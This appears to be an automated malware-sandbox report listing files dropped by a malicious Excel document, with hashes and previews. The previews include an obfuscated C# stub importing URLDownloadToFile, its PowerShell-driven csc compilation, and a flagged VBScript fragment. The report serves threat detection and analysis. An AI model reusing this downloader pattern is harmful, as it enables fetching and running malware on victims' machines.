                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 06:45:32 2024, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1328
                                                                                    Entropy (8bit):3.9959214282105915
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:Hle9E2UBNptdHLwKdNWI+ycuZhNtakS7PNnqSqd:ZBNJcKd41ulta3xqSK
                                                                                    MD5:FFB43510EE1F8FF21902003152DD827E
                                                                                    SHA1:9FCF4BA4124EFD1D18D1F17EB8599BB409AE75EF
                                                                                    SHA-256:C4233C5A6C6C91F0F69C7EF26D9398B1FF4C78FDF5DD34ED22F2F5970A2130BF
                                                                                    SHA-512:C3356610F480B3AECAF421CD5470D9D6AFE52E0833340FE18E7DCD0243CBB7039850AA64D6FBB53F00751AC87538378BD4652829564ECFE321D7A842EB32A5C5
                                                                                    Malicious:false
                                                                                    Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\41k31je4\CSC1CC2DACCE81D4F99A1AD504B85F71256.TMP................O....K..@s...............4.......C:\Users\user\AppData\Local\Temp\RES4A69.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.1.k.3.1.j.e.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 24 06:45:49 2024, 1st section name ".debug$S"
                                                                                    Category:dropped
                                                                                    Size (bytes):1328
                                                                                    Entropy (8bit):3.9799943976905103
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:HFge9Eur8b7dHd0wKdNWI+ycuZhN8akS4PNnqSqd:zr897Kd41ul8a3AqSK
                                                                                    MD5:90651B2ED245E1F48777903F5C22348F
                                                                                    SHA1:C085B7F13F864D7C83FFCB6358182D66574C6CC7
                                                                                    SHA-256:667431320A35C8FA23D02D1063E83BC5C8D6BE5DD08CF4980F0371E511FC9340
                                                                                    SHA-512:A3C7C9F2AA068C2CED947252C8A71C9625AD9760D62947FD8684392DC215C828B46A3D849176B8067D9E5D38626E8A2C536B50F8956E3B56655C7820087ABD08
                                                                                    Malicious:false
                                                                                    Preview:L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\sblybu2m\CSCFEB4FC09456049919CFF236451FA82A.TMP...................D.j.:.$...X+}..........4.......C:\Users\user\AppData\Local\Temp\RES8FC2.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.b.l.y.b.u.2.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):652
                                                                                    Entropy (8bit):3.0950588631558915
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry6ak7Ynqq4PN5Dlq5J:+RI+ycuZhN8akS4PNnqX
                                                                                    MD5:AC9B8E44946AFA3AAF24050811582B7D
                                                                                    SHA1:C60AB80C74F1F885EA2C66CB25319E25E7EF052F
                                                                                    SHA-256:13D6DEA83BA03A7E44D625C0174A69E59CE9FF32E14CAAEAF5D979E7E9E356EC
                                                                                    SHA-512:6DEBC407D49C4D3E9C7730CA01CAB162E7AC4A81FC3AA708CDAF7076CF9995DB28559291FE8FB4407908A4E2B3C9CCDF4896ACD6EDA2002122508B8014294A38
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.b.l.y.b.u.2.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.b.l.y.b.u.2.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (351)
                                                                                    Category:dropped
                                                                                    Size (bytes):469
                                                                                    Entropy (8bit):3.7537928868168384
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:V/DsYLDS81zuly0NIMmFB7QXReKJ8SRHy4H6xr8MCLJWxWJWKy:V/DTLDfuldcWXfH1MeGOWKy
                                                                                    MD5:DE4A3E7070E220B427D460A803BF2B1B
                                                                                    SHA1:F59C55466008CA3D557CC114C01395BA724A3A32
                                                                                    SHA-256:0652DA0455490EAF890DDCBC122A763D5F4031A9B2825D514D105BD8EA142EAE
                                                                                    SHA-512:AFED9FF23E8F788D80F409856741BC68E985EB0092412F91E709D917FC37EA47E43B2560313195E5C0F8FACC6232DDD74E5CA38C66D16AF31D5F7B4984999B85
                                                                                    Malicious:false
                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace rpwYIiFsex.{. public class niee. {. [DllImport("Urlmon.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr RhPAWaU,string ZHOGcU,string Qo,uint lshbPHts,IntPtr j);.. }..}.
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):369
                                                                                    Entropy (8bit):5.199158608225386
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fyUp0zxs7+AEszIP23fyUrH:p37Lvkmb6KzK7WZEoK8H
                                                                                    MD5:B1871D033B642113AAFDF9DF795BF44D
                                                                                    SHA1:0FDFCB9F9C5842CCAF79B3DF2CF2C9595AB06237
                                                                                    SHA-256:1F3762F250690A3B5764AB601C907B0AD885CAFC1D1CD74B170814B8A1C30967
                                                                                    SHA-512:42E4AA997BBA31CE8F33AB62B9AAA10B894247BDADB10665811433266FFB8C20DA9E43A8DBB0126145B89986BB3490C57DA42C705807C38CD40DDEBB5D9764CE
                                                                                    Malicious:false
                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.0.cs"
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):3072
                                                                                    Entropy (8bit):2.809989317716199
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:etGSDIPBG5eM7p8mqBk+lT4z3tkZfhmssqhkWI+ycuZhN8akS4PNnq:6TsM+mAcKJhmssEH1ul8a3Aq
                                                                                    MD5:DDA186FB71EFA989E7D4763BE6A11D03
                                                                                    SHA1:21047F3C5596FA6090789675B365CDB4F9AE8A0A
                                                                                    SHA-256:C01B031FEE4E2B28B8E36BFFE7C6D9F9B6423BF6CAC0BD99923C1D52BF3847E3
                                                                                    SHA-512:E07C120D7E6FD12EFF51E6AB3E69BA2DB230A555E2B52B561817682958FD83B40FE97FB91D639F8CEC3E1407638CA9192A0EEAC8EDA21A53C674C33941D397E2
                                                                                    Malicious:false
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....s.....s.......................................... >.....P ......P.........V.....^.....e.....h.....q...P.....P...!.P.....P.......!.....*.......>.......................................'..........<Module>.sb
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):866
                                                                                    Entropy (8bit):5.332163758428109
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:AId3ka6KztEo5OKaMD5DqBVKVrdFAMBJTH:Akka60tEocKdDcVKdBJj
                                                                                    MD5:8A79E4F6B705ADB2CF07686CE1E226E1
                                                                                    SHA1:642B53260628A63BF7BB565BC13ECCFEF9D0270E
                                                                                    SHA-256:61D04C043114CAA5E41EF6D2EC6DFF5AB2176EBC09B4EB9AD1EE8873A9FB154A
                                                                                    SHA-512:97022D711FDE17CC485A1E949D8F3031ADE467E934A07FE569EAAB97FB5B57FF92072393D7B795914992A58DB54D3A2F7C6794226BBAA7A4CAAE1D4A5576699E
                                                                                    Malicious:false
                                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):512
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3::
                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                    Malicious:false
                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):512
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3::
                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                    Malicious:false
                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):512
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3::
                                                                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                    Malicious:false
                                                                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:U:U
                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                    Malicious:false
                                                                                    Preview:1
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):46
                                                                                    Entropy (8bit):1.0424600748477153
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:/lbWwWl:sZ
                                                                                    MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                                                                    SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                                                                    SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                                                                    SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                                                                    Malicious:false
                                                                                    Preview:........................................user.
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):139890
                                                                                    Entropy (8bit):3.6923510936476616
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:vybNgt5pdGwoO4TxQQYQt2Cwvo6buGauOmM:0DNlYTdvo6TauOx
                                                                                    MD5:52A69AB69D1C871566791A3C06982607
                                                                                    SHA1:367845C8B76D602680EE6069F3BDE95E02C350D9
                                                                                    SHA-256:4F6090A3D6A848AE3EF2310CACA02976FE8448FC21CBE357F4A28A88F34EAD28
                                                                                    SHA-512:681B60151EF27726F8B4C9C0949A8962FA8B16FE3583BA5EE4019831B6AC2AD5BF2562DA0E8FC55CDEC4CB10C59A608896B9BE98BEDD1A8BBDE43B711EE2E0C2
                                                                                    Malicious:true
                                                                                    Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .e.s.t.a.m.b.r.e.i.r.o.)..... . . . .d.i.m. .a.p.o.u.c.a.d.o.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .a.p.o.u.c.a.d.o..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .a.p.o.u.c.a.d.o.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . .
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 07:45:40 2024, Security: 1
                                                                                    Category:dropped
                                                                                    Size (bytes):91136
                                                                                    Entropy (8bit):7.812565947800325
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:QiqHy1S6F8b2SQrEkawpoXIodew5JDPxu8lbiij9dRjMe8DOGJbb:4eFHrE2sIoFj5uybiIdRjMePcv
                                                                                    MD5:9AA09D9D36801CF7950D4E7AE1F38A8D
                                                                                    SHA1:FE90BF6F6BCE3B2FCD2099DD36D947D66676274B
                                                                                    SHA-256:A26CAE0615BD47D3FAF6ED2E501C678A9DC0203D1396E996458EB791DE976227
                                                                                    SHA-512:1357F6E43E8B2CE55565E54F24E2C0E5D199F56CF4C0ECBEC002FC26E896907D4632BFEC636FBD5E0C81A4C9C998E28A58ECD92A4CEE5CBAFEC06F1A087D2DF1
                                                                                    Malicious:false
                                                                                    Preview:......................>...................................N...................q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...........P.......R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...r.......s...t...u...v...w...x...y...z...
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):26
                                                                                    Entropy (8bit):3.95006375643621
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                    Malicious:false
                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 07:45:40 2024, Security: 1
                                                                                    Category:dropped
                                                                                    Size (bytes):91136
                                                                                    Entropy (8bit):7.812565947800325
                                                                                    Encrypted:false
                                                                                    SSDEEP:1536:QiqHy1S6F8b2SQrEkawpoXIodew5JDPxu8lbiij9dRjMe8DOGJbb:4eFHrE2sIoFj5uybiIdRjMePcv
                                                                                    MD5:9AA09D9D36801CF7950D4E7AE1F38A8D
                                                                                    SHA1:FE90BF6F6BCE3B2FCD2099DD36D947D66676274B
                                                                                    SHA-256:A26CAE0615BD47D3FAF6ED2E501C678A9DC0203D1396E996458EB791DE976227
                                                                                    SHA-512:1357F6E43E8B2CE55565E54F24E2C0E5D199F56CF4C0ECBEC002FC26E896907D4632BFEC636FBD5E0C81A4C9C998E28A58ECD92A4CEE5CBAFEC06F1A087D2DF1
                                                                                    Malicious:true
